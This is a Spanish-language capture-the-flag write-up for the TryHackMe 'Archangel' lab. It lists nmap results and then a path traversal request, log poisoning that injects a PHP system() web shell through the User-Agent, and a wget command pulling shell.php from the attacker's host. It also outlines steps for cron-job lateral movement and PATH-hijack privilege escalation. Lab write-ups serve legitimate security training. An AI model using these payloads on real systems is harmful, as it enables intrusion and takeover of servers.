Archangel Writeup - Try-Hack-Me
nmap
1
2
3
4
5
6
7
8
9
10
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 9f1d2c9d6ca40e4640506fedcf1cf38c (RSA)
| 256 637327c76104256a08707a36b2f2840d (ECDSA)
|_ 256 b64ed29c3785d67653e8c4e0481cae6c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Wavefire
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Web
Al poner el dominio, ya tenemos la primera flag.
Fuzzing
1
2
/robots.txt
/test.php
Path Traversal
para ver los logs
1
GET /test.php?view=/var/www/html/development_testing/..//..//..//..//..//var/log/apache2/access.log
User-Agent Spoofing (BurpSuite)
Modificamos el php mediante el parámetro user-Agent:
1
<?php system($_GET['cmd']);?>
Podemos ejecutar comandos mediante el parámetro &cmd=
1
http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//..//var/log/apache2/access.log&cmd=id
Cargamos una shell en php mediante wget.
1
http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//..//var/log/apache2/access.log&cmd=wget http://10.8.189.249:8000/shell.php
Shell www-data
movimiento lateral
hay una tarea cron que se ejecuta cada cierto tiempo, tenemos permisos de escritura en este archivo, así que vamos a meterle una shell, para pasarnos al usuario archangel.
Elevar privilegios
Tenemos un binario backup
que tira de cp
para hacer alguna movida de copia.
vamos a crear un cp
falso el cual agregamos al path para que nos de una bash cuando ejecutemos el binario
WE ARE ROOT
This post is licensed under CC BY 4.0 by the author.